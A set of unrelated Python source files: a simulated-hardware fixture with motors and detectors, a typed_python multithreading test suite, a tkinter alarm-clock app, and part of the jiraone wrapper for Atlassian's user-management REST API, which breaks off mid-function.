motor1 = SynAxis(name='motor1', labels={'motors'})
motor2 = SynAxis(name='motor2', labels={'motors'})
motor3 = SynAxis(name='motor3', labels={'motors'})
jittery_motor1 = SynAxis(name='jittery_motor1',
readback_func=lambda x: x + np.random.rand(),
labels={'motors'})
jittery_motor2 = SynAxis(name='jittery_motor2',
readback_func=lambda x: x + np.random.rand(),
labels={'motors'})
noisy_det = SynGauss('noisy_det', motor, 'motor', center=0, Imax=1,
noise='uniform', sigma=1, noise_multiplier=0.1,
labels={'detectors'})
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1,
labels={'detectors'})
identical_det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1,
labels={'detectors'})
det1 = SynGauss('det1', motor1, 'motor1', center=0, Imax=5, sigma=0.5,
labels={'detectors'})
det2 = SynGauss('det2', motor2, 'motor2', center=1, Imax=2, sigma=2,
labels={'detectors'})
det3 = SynGauss('det3', motor3, 'motor3', center=-1, Imax=2, sigma=1,
labels={'detectors'})
det4 = Syn2DGauss('det4', motor1, 'motor1', motor2, 'motor2',
center=(0, 0), Imax=1, labels={'detectors'})
det5 = Syn2DGauss('det5', jittery_motor1, 'jittery_motor1', jittery_motor2,
'jittery_motor2', center=(0, 0), Imax=1,
labels={'detectors'})
flyer1 = MockFlyer('flyer1', det, motor, 1, 5, 20)
flyer2 = MockFlyer('flyer2', det, motor, 1, 5, 10)
trivial_flyer = TrivialFlyer()
new_trivial_flyer = NewTrivialFlyer()
ab_det = ABDetector(name='det', labels={'detectors'})
# area detector that directly stores image data in Event
direct_img = DirectImage(func=lambda: np.array(np.ones((10, 10))),
name='direct', labels={'detectors'})
direct_img.img.name = 'img'
direct_img_list = DirectImage(func=lambda: [[1] * 10] * 10,
name='direct', labels={'detectors'})
direct_img_list.img.name = 'direct_img_list'
# area detector that stores data in a file
img = SynSignalWithRegistry(func=lambda: np.array(np.ones((10, 10))),
name='img', labels={'detectors'},
save_path=save_path)
invariant1 = InvariantSignal(func=lambda: 0, name='invariant1',
labels={'detectors'})
invariant2 = InvariantSignal(func=lambda: 0, name='invariant2',
labels={'detectors'})
det_with_conf = DetWithConf(name='det', labels={'detectors'})
det_with_count_time = DetWithCountTime(name='det', labels={'detectors'})
rand = SynPeriodicSignal(name='rand', labels={'detectors'})
rand2 = SynPeriodicSignal(name='rand2', labels={'detectors'})
motor_no_pos = SynAxisNoPosition(name='motor', labels={'motors'})
bool_sig = Signal(value=False, name='bool_sig', labels={'detectors'})
motor_empty_hints1 = SynAxisEmptyHints(name='motor1', labels={'motors'})
motor_empty_hints2 = SynAxisEmptyHints(name='motor2', labels={'motors'})
motor_no_hints1 = SynAxisNoHints(name='motor1', labels={'motors'})
motor_no_hints2 = SynAxisNoHints(name='motor2', labels={'motors'})
# Because some of these reference one another we must define them (above)
# before we pack them into a namespace (below).
signal = SynSignal(name='signal')
return SimpleNamespace(
motor=motor,
motor1=motor1,
motor2=motor2,
motor3=motor3,
jittery_motor1=jittery_motor1,
jittery_motor2=jittery_motor2,
noisy_det=noisy_det,
det=det,
identical_det=identical_det,
det1=det1,
det2=det2,
det3=det3,
det4=det4,
det5=det5,
flyer1=flyer1,
flyer2=flyer2,
trivial_flyer=trivial_flyer,
new_trivial_flyer=new_trivial_flyer,
ab_det=ab_det,
direct_img=direct_img,
direct_img_list=direct_img_list,
img=img,
invariant1=invariant1,
invariant2=invariant2,
pseudo3x3=SPseudo3x3(name='pseudo3x3'),
pseudo1x3=SPseudo1x3(name='pseudo1x3'),
sig=Signal(name='sig', value=0),
det_with_conf=det_with_conf,
det_with_count_time=det_with_count_time,
rand=rand,
rand2=rand2,
motor_no_pos=motor_no_pos,
motor_empty_hints1=motor_empty_hints1,
motor_empty_hints2=motor_empty_hints2,
motor_no_hints1=motor_no_hints1,
motor_no_hints2=motor_no_hints2,
bool_sig=bool_sig,
signal=signal,
)
# Dump instances of the example hardware generated by hw() into the global
# namespcae for convenience and back-compat.
globals().update(hw().__dict__)
|
multithreading_test.py
|
# Copyright 2019 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
import time
import unittest
from flaky import flaky
from typed_python import (
Class, Member, Alternative, TupleOf, ListOf, ConstDict, SerializationContext,
Entrypoint, Compiled, localVariableTypesKnownToCompiler
)
import typed_python._types as _types
def thread_apply(f, argtuples):
threads = []
results = {}
def doit(f, ix, *args):
results[ix] = f(*args)
for ix, a in enumerate(argtuples):
threads.append(threading.Thread(target=doit, args=(f, ix) + a))
for t in threads:
t.start()
for t in threads:
t.join()
return [results.get(i) for i in range(len(argtuples))]
class AClass(Class):
x = Member(int)
class TestMultithreading(unittest.TestCase):
@flaky(max_runs=3, min_passes=1)
def test_gil_is_released(self):
@Compiled
def f(x: int):
res = 0.0
for i in range(x):
res += i
return res
ratios = []
for _1 in range(10):
t0 = time.time()
thread_apply(f, [(100000000,)])
t1 = time.time()
thread_apply(f, [(100000000,), (100000001,)])
t2 = time.time()
first = t1 - t0
second = t2 - t1
ratios.append(second/first)
ratios = sorted(ratios)
ratio = ratios[5]
# expect the ratio to be close to 1, but have some error margin, especially on Travis
# where we may be running in a multitenant environment
if os.environ.get('TRAVIS_CI', None):
self.assertTrue(ratio >= .7 and ratio < 1.75, ratio)
else:
self.assertTrue(ratio >= .9 and ratio < 1.1, ratio)
def test_refcounts_of_objects_across_boundary(self):
class Object:
pass
_ = Object()
A = Alternative("A", X={'x': int}, Y={'y': int})
for instance in [
TupleOf(int)((1, 2, 3)),
ListOf(int)((1, 2, 3)),
# Dict(int,int)({1:2,3:4}),
ConstDict(int, int)({1: 2, 3: 4}),
AClass(),
# anObject,
A.X(x=10)
]:
self.refcountsTest(instance)
def refcountsTest(self, instance):
typeOfInstance = type(instance)
@Compiled
def rapidlyIncAndDecref(x: typeOfInstance):
_ = x
for _1 in range(1000000):
_ = x
return x
thread_apply(rapidlyIncAndDecref, [(instance,)] * 10)
self.assertEqual(_types.refcount(instance), 1)
def test_serialize_is_parallel(self):
if os.environ.get('TRAVIS_CI', None):
return
T = ListOf(int)
x = T()
x.resize(1000000)
sc = SerializationContext().withoutCompression()
def f():
for i in range(10):
sc.deserialize(sc.serialize(x, T), T)
ratios = []
for i in range(10):
t0 = time.time()
thread_apply(f, [()])
t1 = time.time()
thread_apply(f, [(), ()])
t2 = time.time()
first = t1 - t0
second = t2 - t1
ratios.append(second/first)
ratios = sorted(ratios)
ratio = ratios[5]
# expect the ratio to be close to 1, but have some error margin
self.assertTrue(ratio >= .8 and ratio < 1.2, ratios)
def test_can_access_locks_in_compiler_with_locks_as_obj(self):
lock = threading.Lock()
recursiveLock = threading.RLock()
@Compiled
def lockFun(l: object):
with l:
return 10
# these methods will hit 'l' using the interpreter
self.assertEqual(lockFun(lock), 10)
self.assertEqual(lockFun(recursiveLock), 10)
self.assertFalse(lock.locked())
def test_can_access_locks_in_compiler_with_typed_locks(self):
lock = threading.Lock()
recursiveLock = threading.RLock()
@Compiled
def lockFun(l: threading.Lock):
with l:
return 10
@Compiled
def recursiveLockFun(l: threading.RLock):
with l:
return 10
# these methods will hit the lock objects directly, bypassing
# the interpreter and using C code.
self.assertEqual(lockFun(lock), 10)
self.assertEqual(recursiveLockFun(recursiveLock), 10)
self.assertFalse(lock.locked())
@flaky(max_runs=3, min_passes=1)
def test_lock_perf(self):
lock = threading.Lock()
recursiveLock = threading.RLock()
aList = ListOf(int)([0])
@Compiled
def lockFun(l: threading.Lock, aList: ListOf(int), count: int):
print("I KNOW THESE AS ", localVariableTypesKnownToCompiler())
for _ in range(count):
with l:
aList[0] += 1
@Compiled
def recursiveLockFun(l: threading.RLock, aList: ListOf(int), count: int):
for _ in range(count):
with l:
aList[0] += 1
t0 = time.time()
lockFun(lock, aList, 1000000)
t1 = time.time()
recursiveLockFun(recursiveLock, aList, 1000000)
t2 = time.time()
# I get around 0.02 for this, which is 50mm locks / second when there is no
# contention.
self.assertLess(t1 - t0, .1)
self.assertLess(t2 - t1, .1)
def test_lock_works(self):
lock = threading.Lock()
aList = ListOf(int)([0])
@Entrypoint
def loopWithLock(l, aList, count):
for _ in range(count):
with l:
aList[0] += 1
ct = 1000000
threads = [threading.Thread(target=loopWithLock, args=(lock, aList, ct)) for _ in range(4)]
for t in threads:
t.start()
for t in threads:
t.join()
# this test will fail (badly) if you remove the lock because we won't add up
# to the right amount.
self.assertEqual(ct * 4, aList[0])
@flaky(max_runs=3, min_passes=1)
def test_lock_with_separate_locks_perf(self):
@Entrypoint
def loopWithLock(l, aList, count):
for _ in range(count):
with l:
aList[0] += 1
def timeFor(threadCount, ct):
t0 = time.time()
threads = [threading.Thread(target=loopWithLock, args=(threading.Lock(), ListOf(int)([0]), ct)) for _ in range(threadCount)]
for t in threads:
t.start()
for t in threads:
t.join()
return time.time() - t0
# prime the compiler
timeFor(1, 10)
oneThread = timeFor(1, 1000000)
twoThreads = timeFor(2, 1000000)
# we should see that we don't really change performance, because our test is using separate
# locks for each of the two threads in the second case. I get almost exactly 1.0 for this,
# but on Travis, because we don't get a dedicated box, we can get more than 1. If the lock
# is held as 'object', you'd see 2.0 or higher, so this still verifies that we are
# getting c-level parallelism at this threshold.
self.assertLess(twoThreads / oneThread, 1.65, (oneThread, twoThreads))
|
alarms.py
|
import tkinter as tk
from tkinter import messagebox
from tkinter.font import Font
from time import sleep, strftime
from threading import Thread
try:
from alarm import Alarm
from sql_connector import SqlConnector
except ImportError:
from .alarm import Alarm
from .sql_connector import SqlConnector
class Alarms(tk.Frame):
def __init__(self, parent):
tk.Frame.__init__(self, parent)
self.canvas_frame = tk.Frame(self)
self.canvas_frame.parent = self
self.alarms_canvas = tk.Canvas(self.canvas_frame)
self.alarms_canvas.parent = self.canvas_frame
self.alarms = tk.Frame(self.alarms_canvas)
self.alarms.parent = self.alarms_canvas
self.add_alarm_button = tk.Button(self, text="Add Alarm", command=self.add_alarm)
self.scrollbar = tk.Scrollbar(self.canvas_frame, orient=tk.VERTICAL,
command=self.alarms_canvas.yview)
self.add_alarm_button.pack(side=tk.TOP, fill=tk.X, expand=0)
self.canvas_frame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.alarms_canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y, expand=0)
# Creating long list of alarm frames. Values populated from database
self.db = SqlConnector()
self.alarm_frames = []
self.add_alarms()
self.thread = Thread(target=self.check_time, daemon=True)
self.thread.start()
self.alarms_canvas.bind("<Configure>", self.on_canvas_resize)
def check_time(self):
while True:
if int(strftime("%S")) in [0, 1, 2]:
time = strftime("%I:%M %p")
for alarm in self.alarms_data:
if alarm[1] == time and alarm[2] == "True":
for alarm_obj in self.alarm_frames:
if alarm[0] == alarm_obj.id:
if alarm_obj.alarm_sound is None:
alarm_obj.play_sound()
break
sleep(1)
def add_alarms(self):
self.alarms_data = self.db.collect()
for alarm_frame in self.alarm_frames:
alarm_frame.pack_forget()
self.alarm_frames = []
for row in range(len(self.alarms_data)):
self.alarm_frames.append(Alarm(self.alarms, self.alarms_data[row][0],
self.alarms_data[row][1], "SunMonTueWedThuFriSat",
None, "", self.alarms_data[row][2]))
for alarm_frame in self.alarm_frames:
alarm_frame.pack(side=tk.TOP, fill=tk.X, expand=1)
self.alarms_canvas.create_window(0, 0, anchor='nw', window=self.alarms,
tags="alarms")
self.alarms_canvas.update_idletasks()
self.alarms_canvas.configure(scrollregion=self.alarms_canvas.bbox('all'),
yscrollcommand=self.scrollbar.set)
self.on_canvas_resize()
def remove_alpha(self, var, index, mode):
if str(var) == "PY_VAR0": # new_hr StringVar is edited
current = self.new_hr.get()
self.new_hr.set("".join(x for x in current if x.isdigit()))
current = str(self.new_hr.get())
if str(current) == "":
self.new_hr.set(1)
elif int(current) > 12:
self.new_hr.set(12)
if str(var) == "PY_VAR1": # new_min StringVar is edited
current = self.new_min.get()
self.new_min.set("".join(x for x in current if x.isdigit()))
current = str(self.new_min.get())
if str(current) == "":
self.new_min.set(0)
elif int(current) > 59:
self.new_min.set(59)
def add_alarm(self):
self.add_window = tk.Toplevel(self)
self.new_hr = tk.StringVar()
self.new_min = tk.StringVar()
self.am_pm = tk.StringVar()
self.new_active = tk.StringVar()
self.new_hr.trace_add("write", self.remove_alpha)
self.new_min.trace_add("write", self.remove_alpha)
self.am_pm.set(0)
self.new_active.set(1)
self.add_frame = tk.Frame(self.add_window)
self.spinbox_frame = tk.Frame(self.add_frame)
self.hours_frame = tk.LabelFrame(self.spinbox_frame,
text="Set hour:")
self.hours_select = tk.Spinbox(self.hours_frame, from_=1, to=12,
textvariable=self.new_hr, width=5,
font=Font(family='Helvetica', size=36,
weight='bold'))
self.minutes_frame = tk.LabelFrame(self.spinbox_frame,
text="Set minute:")
self.minutes_select = tk.Spinbox(self.minutes_frame, from_=0, to=59,
textvariable=self.new_min, width=5,
font=Font(family='Helvetica', size=36,
weight='bold'))
self.am_pm_frame = tk.LabelFrame(self.spinbox_frame,
text="Set Am/PM:")
self.set_am = tk.Radiobutton(self.am_pm_frame, text="AM", variable=self.am_pm,
value=0)
self.set_pm = tk.Radiobutton(self.am_pm_frame, text="PM", variable=self.am_pm,
value=1)
self.active_button = tk.Checkbutton(self.add_frame, text="Set Active:", variable=self.new_active)
self.save_button = tk.Button(self.add_window, text="Save", command=self.confirm_add_alarm)
self.cancel_button = tk.Button(self.add_window, text="Cancel", command=self.add_window.destroy)
self.spinbox_frame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.hours_select.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.minutes_select.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.set_am.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.set_pm.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.hours_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.minutes_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.am_pm_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.active_button.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.add_frame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.save_button.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.cancel_button.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
def confirm_add_alarm(self):
self.confirm = messagebox.askyesno(message="Are you sure you want to complete this action?", icon="question", title="Confirm Action",
default="yes")
if self.confirm is True:
am_pm = int(self.am_pm.get())
if am_pm == 0:
am_pm = "AM"
elif am_pm == 1:
am_pm = "PM"
else:
print("There was an error with the am_pm value:", am_pm)
raise ValueError
new_hr = str(self.new_hr.get())
new_min = str(self.new_min.get())
if len(new_hr) == 1:
new_hr = "0" + new_hr
if len(new_min) == 1:
new_min = "0" + new_min
time = new_hr + ":" + new_min + " " + am_pm
active = int(self.new_active.get())
if active == 0:
active = "False"
elif active == 1:
active = "True"
else:
print("There was an error with the active value:", active)
raise ValueError
self.db.insert(time, active)
self.alarms_canvas.delete("all")
self.add_alarms()
self.add_window.destroy()
elif self.confirm is False:
self.add_window.destroy()
else:
print("There was an error with the self.confirm value:", self.confirm)
self.confirm_add_alarm()
def on_canvas_resize(self, *args):
self.alarms.width = self.alarms_canvas.winfo_width()
self.alarms_canvas.itemconfig('alarms',
width=self.alarms_canvas.winfo_width())
self.alarms_canvas.update_idletasks()
if __name__ == "__main__":
root = tk.Tk()
root.geometry("600x185")
root.minsize(420, 170)
root.title("Alarms")
alarms = Alarms(root)
alarms.pack(fill=tk.BOTH, expand=1)
def on_close():
alarms.db.close()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_close)
root.mainloop()
|
management.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Get access to Atlassian User management REST API.
You can use the same API key for the organizations REST API and the user management REST API.
Create an API key from this URL https://confluence.atlassian.com/x/jPnJOQ
This API provides all the access to the User management REST API.
"""
import typing as t
import requests
import threading
import re
from jiraone.exceptions import JiraOneErrors
from collections import deque
# Define APIs
class UserManagement:
"""
The UserManagement API is used to access organization profiles on Atlassian sites.
The alias to this class is called ``manage``
It comes with the below attributes and methods.
.. code-block:: python
token = "YUISNxxx"
manage.api_token(token)
manage.LINK # attribute
manage.AUTH # attribute
"""
# Define constants
LINK = "https://api.atlassian.com"
AUTH = {"Accept": "application/json"}
def __init__(self) -> None:
"""
A Constructor which also helps with property initialization.
"""
# Property entry point.
self._org_id_ = None
self._org_ids_ = None
self._domain_id_ = None
self._policy_id_ = None
self._event_id_ = None
def get_user_permission(self, account_id: str, query: list = None) -> t.Any:
"""Returns the set of permissions you have for managing the specified Atlassian account.
:param account_id: A user string value for Atlassian accounts
:param query: A query parameter of Array<string>
*Valid options*
Valid values: profile, profile.write, profile.read, email.set, lifecycle.enablement,
apiToken.read, apiToken.delete
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
url = f"{self.LINK}/users/{account_id}/manage" if query is None else \
f"{self.LINK}/users/{account_id}/manage?{query}"
return requests.get(url, headers=self.AUTH)
def manage_profile(self, account_id: str, method: str = "GET", **kwargs: t.Any) -> t.Any:
"""Returns information about a single Atlassian account by ID by using a "GET" request.
:request PATCH: Updates fields in a user account.
The profile.write privilege details which fields you can change.
:request PUT: Sets the specified user's email address.
Before using this endpoint, you must verify the target domain
:param account_id: A user string value for Atlassian accounts
:param method: A response method condition
*Available options*
:request GET: Get the return request
:request PATCH: Updates a given set of data
:body parameter: Any or all user object this is value
e.g. {"name": "Lila User", "nickname": "marshmallow"}
:request PUT: Change the email account of the user
:body parameter: email - string
e.g. {"email": "prince.nyeche@elfapp.website"}
:param kwargs: - Contains other options passed to the requests.<patch>
.. code-block:: python
# previous expression
# json=<variable_name>
payload = {"email": "prince.nyeche@elfapp.website"}
manage.manage_profile("account_id", "<method>", json=payload)
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
url = f"{self.LINK}/users/{account_id}/manage/profile" if method.lower() == "get" or method.lower() == "patch" \
else f"{self.LINK}/users/{account_id}/manage/email"
if method.lower() == "get":
return requests.get(url, headers=self.AUTH)
if method.lower() == "patch":
return requests.patch(url, **kwargs, headers=self.AUTH)
if method.lower() == "put":
return requests.put(url, **kwargs, headers=self.AUTH)
else:
raise JiraOneErrors("wrong", "The method you posted is not available for this operation.")
def api_token(self, account_id: str, method: str = "GET", token_id: str = None) -> t.Any:
"""Gets the API tokens owned by the specified user
or Deletes a specified API token by ID.
:param account_id: A user string value for Atlassian accounts
:param method: A response method condition
:param token_id: A user token id to be deleted.
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
url = f"{self.LINK}/users/{account_id}/manage/api-tokens" if token_id is None else \
f"{self.LINK}/users/{account_id}/manage/api-tokens/{token_id}"
if method.lower() == "get":
return requests.get(url, headers=self.AUTH)
elif method.lower() == "delete":
return requests.delete(url, headers=self.AUTH)
else:
raise JiraOneErrors("wrong", "Unexpected method received. Only \"GET\" or \"DELETE\" methods allowed")
def manage_user(self, account_id: str, disable: bool = True, **kwargs) -> t.Any:
"""Disables the specified user account.
The permission to make use of this resource is exposed by the lifecycle.enablement privilege.
OR
Enables the specified user account.
The permission to make use of this resource is exposed by the lifecycle.enablement privilege.
:param account_id: A user string value for Atlassian accounts
:param disable: A bool option, if True this API url is set to disabled
:param kwargs: Additional keyword argument to pass body data
*Options available when disable is False*
.. code-block:: python
# previous expression
payload = {"message": "On 6-month suspension"}
manage.manage_user("account_id", json=payload)
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
url = f"{self.LINK}/users/{account_id}/manage/lifecycle/disable" if disable is True else \
f"{self.LINK}/users/{account_id}/manage/lifecycle/enable"
return requests.post(url, **kwargs, headers=self.AUTH)
def get_organization(self, org_id: t.Optional[str] = None,
filter_by: t.Optional[str] = None,
domain_id: t.Optional[str] = None,
event_id: t.Optional[str] = None,
action: t.Optional[bool] = True,
policy_id: t.Optional[str] = None,
**kwargs: t.Any) -> t.Any:
"""GET request for the organization API.
Returns a list of your organizations (based on your API key).
Returns information about a single organization by ID.
Returns a list of users in an organization.
Returns a list of domains in an organization one page at a time.
Returns information about a single verified domain by ID.
Returns information about a single event by ID.
Returns information about org policies
Returns information about a single policy by ID
:param org_id: Retrieve the organization id from the API key
:param domain_id: Retrieve domain details
:param filter_by: Use to determine the endpoint to return
*Valid options*
* users - return the users in an organization
* domains - list of domains in an organization
* events - list of events in an audit log
* policies - get the policy of the organization
:param event_id: Use to determine the events in the audit log
:param action: Additional positional argument for events. True sets events-actions
* action - Sets the event actions, true to enable by default set to true.
e.g action=True
:param policy_id: An id of the policy
:param kwargs: Optional arguments
*Valid options*
Any response argument
e.g json=payload
data=payload
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
org_id = self._org_id_ if org_id is None else org_id
if filter_by is None:
if org_id is None and domain_id is None:
url = f"{self.LINK}/admin/v1/orgs"
resp = requests.get(url, headers=self.AUTH, **kwargs)
self._parse_data_obj(resp, types="org")
return resp
elif org_id is not None and domain_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}"
return requests.get(url, headers=self.AUTH, **kwargs)
else:
if filter_by == "users":
if org_id is not None and domain_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/users"
return requests.get(url, headers=self.AUTH, **kwargs)
elif filter_by == "domains":
if org_id is not None and domain_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/domains"
resp = requests.get(url, headers=self.AUTH, **kwargs)
self._parse_data_obj(resp, types="domain")
return resp
elif org_id is not None and domain_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/domains/{domain_id}"
return requests.get(url, headers=self.AUTH, **kwargs)
elif filter_by == "events":
if org_id is not None:
if action is False and event_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/events"
resp = requests.get(url, headers=self.AUTH, **kwargs)
self._parse_data_obj(resp, types="event")
return resp
elif action is False and event_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/events/{event_id}"
return requests.get(url, headers=self.AUTH, **kwargs)
elif action is True and event_id is None or event_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/event-actions"
return requests.get(url, headers=self.AUTH, **kwargs)
elif filter_by == "policies":
if org_id is not None:
if policy_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies"
resp = requests.get(url, headers=self.AUTH, **kwargs)
self._parse_data_obj(resp, types="policy")
return resp
elif policy_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}"
return requests.get(url, headers=self.AUTH, **kwargs)
else:
raise JiraOneErrors("wrong", "Unexpected error - unable to determine parameter value")
def manage_organization(self, org_id: str, method: str = "POST",
policy_id: t.Optional[str] = None,
resource_id: t.Optional[str] = None,
**kwargs: t.Any) -> t.Any:
"""Create, put and delete organization data
Create a policy for an org
Send a post request by using method="post" as keyword args
Update a policy for an org.
Send a put request by using method="put" as keyword args
You will need to send a payload for the body using the example shown below
.. code-block:: json
{
"id": "<string>",
"type": "policy",
"attributes": {
"type": "ip-allowlist",
"name": "<string>",
"status": "enabled",
"rule": {},
"resources": [
{
"id": "<string>",
"meta": {
"scheduledDate": "<string>",
"migrationStartDateTime": "<string>",
"migrationEndDataTime": "<string>",
"atlassianAccountId": "<string>"
},
"links": {
"ticket": "<string>"
}
}
]
}
}
Delete a policy for an org
:param org_id: ID of the organization to create policy for
:param method: A response method to set
*Valid options*
* PUT - updates resource
* POST - creates resource
* DELETE - removes resources
:param policy_id: ID of the policy
:param resource_id: Resource ID
:param kwargs: Additional data to sent in request body
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
if method.lower() == "post":
if org_id is not None and policy_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies"
return requests.post(url, headers=self.AUTH, **kwargs)
elif org_id is not None and policy_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}/resources"
return requests.post(url, headers=self.AUTH, **kwargs)
elif method.lower() == "put":
if org_id is not None and policy_id is not None and resource_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}"
return requests.put(url, headers=self.AUTH, **kwargs)
elif org_id is not None and policy_id is not None and resource_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}/resources/{resource_id}"
return requests.put(url, headers=self.AUTH, **kwargs)
elif method.lower() == "delete":
if org_id is not None and policy_id is not None and resource_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}"
return requests.delete(url, headers=self.AUTH, **kwargs)
elif org_id is not None and policy_id is not None and resource_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}/resources/{resource_id}"
return requests.delete(url, headers=self.AUTH, **kwargs)
else:
raise JiraOneErrors("wrong", "Method is not allowed - unexpected option entered method argument.")
@property
def org_id(self):
"""Get property of organization id"""
return self._org_id_
@org_id.setter
def org_id(self, content):
"""Sets the value property of organization id"""
self._org_id_ = content
@property
def org_ids(self):
"""Get property of organization ids"""
return self._org_ids_
@org_ids.setter
def org_ids(self, content):
"""Sets the value property of organization ids"""
self._org_ids_ = content
@property
def domain_id(self):
"""Get property of organization domain id"""
return self._domain_id_
@domain_id.setter
def domain_id(self, content):
"""Sets the value property of organization domain id"""
self._domain_id_ = content
@property
def policy_id(self):
"""Get property of organization policy id"""
return self._policy_id_
@policy_id.setter
def policy_id(self, content):
"""Sets the value property of organization policy id"""
self._policy_id_ = content
@property
def event_id(self):
"""Get property of organization event id"""
return self._event_id_
@event_id.setter
def event_id(self, content):
"""Sets the value property of organization event id"""
self._event_id_ = content
def __repr__(self):
return f"<JiraOne: {self.LINK} \n" \
f"This API is accessible>"
def _parse_data_obj(self, data: requests.Response, types: str = "org") -> None:
"""Parse JSON response object for organization properties.
:param data: A response object
:param types: A string of available attributes
:return: None
"""
many = []
total = -1 if types == "org" or types == "domain" else data.json()['meta']['total']
count = 0
for ids in data.json()['data']:
many.append(ids['id']) if 'id' in ids and total == -1 else 0
while count < total:
count += 1
many.append(ids['id'])
if count >= total:
break
if len(many) == 1:
if types == "org":
self._org_id_ = many[0]
elif types == "policy":
self._policy_id_ = many[0]
elif types == "domain":
self._domain_id_ = many[0]
elif types == "event":
self._event_id_ = many[0]
if len(many) > 1:
if types == "org":
self._org_ids_ = many
elif types == "policy":
self._policy_id_ = many
elif types == "domain":
self._domain_id_ = many
elif types == "event":
self._event_id_ = many
def add_token(self, token: str) -> None:
"""Adds a Bearer token to authenticate the API.
:param token: An API key
:return: None
"""
if not isinstance(token, str):
raise JiraOneErrors("value", "An API token of type string is required")
if token == "":
raise JiraOneErrors("value", "Your API token cannot be an empty string.")
self.AUTH.update({"Authorization": f"Bearer {token}"})
# Make a request to get the organization id, domain_id and policy_id and store it as a <property.name_id>
try:
# Get access to property values
threading.Thread(target=self.get_organization).run()
threading.Thread(target=self.get_organization, kwargs={"filter_by": "policies"}).run()
threading.Thread(target=self.get_organization, kwargs={"filter_by": "domains"}).run()
# This property is accessible to premium / enterprise users, so turning off this feature by default,
# You can still call this from the events request.
# threading.Thread(target=self.get_organization, kwargs={"filter_by": "events", "action": False}).run()
except KeyError:
raise JiraOneErrors("warning", "Your connection has failed. Please check the response to see the reason!")
def get_all_users(self, source, detail: bool = False) -> deque:
"""Store all user list from organization, so we can search them by email.
:param source: A JSON response payload
:param detail: Bool defaults to False
:return: Deque List
"""
exit("Your source data isn't a valid JSON object.") if not isinstance(source, t.Mapping) else ""
user_collection = deque()
exit(f"Incorrect data type {type(detail)} for keyword argument 'detail'. "
f"Expecting bool type") \
if not isinstance(detail, bool) else True if detail is True else False
print("Checking organization users...")
while True:
next_item_data = source['links']['next'] if 'links' in source \
and len(source['links']) > 1 else {}
for item in source['data']:
user_data = {
"account_id": item.get('account_id'),
"email": item.get('email')
} if detail is False else \
{
"account_id": item.get('account_id'),
"email": item.get('email'),
"account_type": item.get('account_type'),
"account_status": item.get('account_status'),
"name": item.get('name'),
"product_access": item.get('product_access'),
"link": item.get('links'),
"access_billable": item.get('access_billable'),
"picture": item.get('picture'),
"last_active": item.get('last_active')
}
user_collection.append(list(user_data.values())) if detail is False else \
user_collection.append(user_data)
# If our next item is an empty dict, we want to stop the loop.
if isinstance(next_item_data, dict):
break
source = requests.get(next_item_data, headers=self.AUTH).json()
return user_collection
@staticmethod
def find_user(query: str, source: t.List = None) -> t.Union[t.Dict, t.List]:
"""Finds a specific user.
:param query: A search term, could be an email, displayname or accountId if
the ``source`` data is gotten from ``self.get_all_users`` and parameter ``detail=True``
:param source: A list of users
:returns: A dict of the user data or a list of the data
"""
search = None
pattern_name = r"[\s]" # This could be the name of a person
pattern_email = r"[\@]" # This could be an email address
pattern_aaid = r"[{5|6|7|8}[a-z]+" # This could be the account_id
for term in source:
if len(re.findall(pattern_aaid, query)) > 3:
if 'account_id' in term:
if term['account_id'] == query:
search = term
else:
if term[0] == query:
search = term
if len(re.findall(pattern_email, query)) == 1:
if 'email' in term:
if term['email'] == query:
search = term
else:
if term[1] == query:
search = term
